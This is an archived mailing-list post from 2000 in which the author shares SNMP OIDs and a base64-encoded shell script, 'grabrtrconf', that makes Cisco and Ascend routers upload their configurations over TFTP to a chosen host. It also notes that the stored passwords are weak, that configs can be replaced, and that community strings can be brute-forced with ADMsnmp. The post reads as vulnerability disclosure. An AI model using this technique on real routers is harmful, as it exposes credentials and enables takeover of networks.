This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mimeat_private for more info. --0-1115322660-950858272=:9410 Content-Type: TEXT/PLAIN; charset=US-ASCII Disclaimer: The attached utility is based on widely known public information and it's functionality is replicated in many very expensive commercial products. This information is provided for educational purposes only. I am not responsible for misuse of this tool or information. May this script help make SNMP die the sad lonely death it deserves once and for all! On that note... I originally cobbled this together to keep the network admins I worked with from doing annoying things like keeping tftp daemons running on my Unix hosts for weeks on end. Its pretty handy for that too. It's just a lame little script to automate snmp/tftp config dumps from ciscos and ascends using snmp/tftp with a temporary tftp server. I thought it might be of interest (to some) while we're on the subject (again) of snmp router config downloads. I've seen several home-grown versions of this for ciscos out there, a handful for ascends, but have not run across any that do both, so... The OID's to acomplish this on ciscos and ascends are below. Basically in both cases doing an SNMP set on certain variables will trigger the tftp config upload from the target router. 'XXX' denotes IP address octets for where you want the config to go. Cisco: SNMP set .1.3.6.1.4.1.9.2.1.55.XXX.XXX.XXX.XXX type=s(string) "tftp-filename" Ascend: SNMP set .1.3.6.1.4.1.529.9.5.3.0 type=a(addr) XXX.XXX.XXX.XXX SNMP set .1.3.6.1.4.1.529.9.5.4.0 type=s(string) "tftp-filename" As everybody knows, Cisco type 7 hashes are trivial, and ascends keep passwords unencrypted, so this tool or one of the zillion others like it (HP Openview anybody?) could be used by crazed frothy-mouthed sociopaths to dish out truckloads of evil upon meek internet-shoppers!!!@!@#$!!! As others already have mentioned, it's worse too since you could just replace a config if you're in the mood. The OID's to accomplish that can be found in the respective cisco and ascend MIBs nearby the ones outlined above. I didnt put these in my script for fairly obvious reasons given it's original intended users ;) -Eric Monti --BTW. 9 out of 10 'forgetful admins' recommend the use of ADMsnmp for brute-forcing communities! On Tue, 15 Feb 2000, Gus Huber wrote: > It should be noted in this discussion that MANY of these devices also > through SNMP querys can be completely compromised by either sending or > recieving configuration files from arbritrary locations. Both cisco and > ascend products support downloading and uploading of configuration files > via tftp from an SNMP query. From that point it is trivial to sniff > network trafic. AFAIK, ascend still ships with the SNMP communitys set as > public for read-only, and write for RW. Also many hardware devices do not > log querys sent to invalid SNMP communitys in SNMPv1, so it is a simple > game of brute force to get those communitys. --0-1115322660-950858272=:9410 Content-Type: TEXT/PLAIN; charset=US-ASCII; name=grabrtrconf Content-Transfer-Encoding: BASE64 Content-ID: <Pine.BSF.3.96.1000218011752.9410D@mournblade> Content-Description: IyEvYmluL3NoDQojICBncmFicnRyY29uZjoNCiMgIFB1bGwgcm91dGVyIGNv bmZpZ3MgdmlhIHRmdHAgZm9yIGNpc2NvJ3MgYW5kIGFzY2VuZHMuIG9idmlv dXNseSB0cml2aWFsIHRvDQojICBtb2RpZnkgdGhpcyBmb3Igb3RoZXIgbmV0 d29yayBoYXJkd2FyZSB0aGF0IHN1cHBvcnRzIHRoaXMgdHlwZSBvZiB0aGlu Zy4NCiMNCiMgIC0gW3R5cGVdIGNhbiBiZSBvbmUgb2YgY2lzY28gfCBhc2Nl bmQgY3VycmVudGx5DQojICAtIGRlZmF1bHRzIHRvIGNpc2NvDQojICAtIHJl cXVpcmVzIGNtdSBzbm1wIHV0aWxpdGllcyAoc25tcHNldCBzcGVjaWZpY2Fs bHkpDQojICAtIHVzZSBURlRQTElTVEVOIGFuZCBkaXNhYmxlIHRmdHAgZnJv bSAvZXRjL2luZXRkLmNvbmYgaWYgeW91IHdhbnQgdG8NCiMgICAgbGF1bmNo IGEgJ3RlbXBvcmFyeScgaW4udGZ0cGQganVzdCB0byBncmFiIHRoZSBmaWxl Lg0KIyAgLSAncGlkb2YnIG9ubHkgZXhpc3RzIG9uIGxpbnV4IHRoYXQgSSBr bm93IG9mIHdoaWNoIGtpbmRvZiBtYWtlcyB0aGlzIGEgDQojICAgIGxpbnV4 LW9ubHkgdG9vbCwgdW5sZXNzL3VudGlsIEkgZGVjaWRlIHRvIHN0b3AgcmVs eWluZyBvbiBpdC4NCiMgIC0gU2V0ICdJTlQnIHRvIHdoYXRldmVyIHlvdXIg cm91dGFibGUgSVAgaXMuDQojICAtIHJ1biBhcyByb290IChpZiB5b3Ugd2Fu dCB0byBsYXVuY2ggdGhlIHRmdHAgc2VydmVyKQ0KIw0KIyAgLSBJIGtub3cg dGhpcyBpcyBsYW1lLi4uIGJ1dCBpdCB3b3JrcyAobW9zdCBvZiB0aGUgdGlt ZSkuDQojDQojICBieTogRXJpYyBNb250aSAxMS8xOTk3DQojIA0KDQpURlRQ TElTVEVOPSJ0cnVlIg0KDQpESVI9L3RmdHBib290ICNtaWdodCB3YW50IHRv IHVzZSBzb21ldGhpbmcgZWxzZQ0KV0FJVD02DQpJTlQ9cHBwMA0KIA0KdGVz dCAiJDQiID0gIiIgJiYgZWNobyAiVXNhZ2U6IGBiYXNlbmFtZSAkMGAgdGFy Z2V0IHdyaXRlLWNvbW11bml0eSB0ZnRwaG9zdCBmaWxlbmFtZSBbdHlwZV0i ICYmIGV4aXQgMQ0KDQpUWVBFPSQ1DQp0ZXN0ICIkNSIgPSAiIiAmJiBUWVBF PSJjaXNjbyINCg0KSVBBRERSPSQzDQp0ZXN0ICIkSVBBRERSIiA9ICIuIiAm JiBJUEFERFI9YC9zYmluL2lmY29uZmlnICRJTlQgfCBncmVwIGluZXQgfCBz ZWQgInMvXDovXCAvIiB8IGF3ayAne3ByaW50ICQzfSdgDQoNCmVjaG8gJDMN Cg0KaWYgWyAtbiAkVEZUUExJU1RFTiBdO3RoZW4NCgllY2hvICJ0ZnRwIGRn cmFtIHVkcCB3YWl0IHJvb3QgL3Vzci9zYmluL2luLnRmdHBkIGluLnRmdHBk ICRESVIiID4gL3RtcC9pbmQuY29uZg0KCS91c3Ivc2Jpbi9pbmV0ZCAtZCAv dG1wL2luZC5jb25mICYNCglybSAvdG1wL2luZC5jb25mDQoJcm0gLWYgJERJ Ui8kNA0KCXRvdWNoICRESVIvJDQNCgljaG1vZCA2NjYgJERJUi8kNA0KZmkN Cg0KI0NJU0NPIGdldCBjb25maWcNCnRlc3QgIiRUWVBFIiA9ICJjaXNjbyIg JiYgXA0Kc25tcHNldCAtciAzIC10IDMgJDEgJDIgLjEuMy42LjEuNC4xLjku Mi4xLjU1LiRJUEFERFIgcyAkNA0KDQojQVNDRU5EIGdldCBjb25maWcNCmlm IFsgIiRUWVBFIiA9ICJhc2NlbmQiIF07dGhlbg0KICBzbm1wc2V0IC1yIDMg LXQgMyAkMSAkMiAuMS4zLjYuMS40LjEuNTI5LjkuNS4zLjAgYSAkSVBBRERS IA0KICBzbm1wc2V0IC1yIDMgLXQgMyAkMSAkMiAuMS4zLjYuMS40LjEuNTI5 LjkuNS40LjAgcyAkNA0KICBzbm1wc2V0IC1yIDMgJDEgJDIgLjEuMy42LjEu NC4xLjUyOS45LjUuMS4wIGkgMw0KICBzbm1wc2V0IC1yIDMgJDEgJDIgLjEu My42LjEuNC4xLjUyOS45LjUuMy4wIGEgIjAuMC4wLjAiDQogIHNubXBzZXQg LXIgMyAkMSAkMiAuMS4zLjYuMS40LjEuNTI5LjkuNS40LjAgcyAiIg0KZmkN Cg0Kc2xlZXAgJFdBSVQNCg0KIyBpIGdvdCBsYXp5IGFuZCB1c2VkIHBpZG9m Li4uIHNvIHdoYXQuIA0KIyBJIG1hZGUgcHJldHR5IGRvdHMgYXBwZWFyIHRv IG1ha2UgdXAgZm9yIGl0IQ0KaWYgKHRlc3QgYHBpZG9mIGluLnRmdHBkYCk7 dGhlbg0KDQoNCiBlY2hvIFJlY2VpdmluZyBmaWxlOiANCiB3aGlsZSAodGVz dCAiYHBpZG9mIGluLnRmdHBkYCIpO2RvDQoJZWNobyAtbiAuDQoJc2xlZXAg MQ0KIGRvbmUNCiBlY2hvDQogZWNobyBUcmFuc2ZlciBDb21wbGV0ZQ0KDQpm aQ0KDQppZiBbIC1uICRURlRQTElTVEVOIF07dGhlbg0KCWtpbGwgYGNhdCAv dmFyL3J1bi9pbmV0ZC5waWRgICMgamVlcGVycywgaSBob3BlIHRoYXQgd2Fz bnQgdGhlIHJlYWwxDQpmaQ0KDQoNCg== --0-1115322660-950858272=:9410--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:35:53 PDT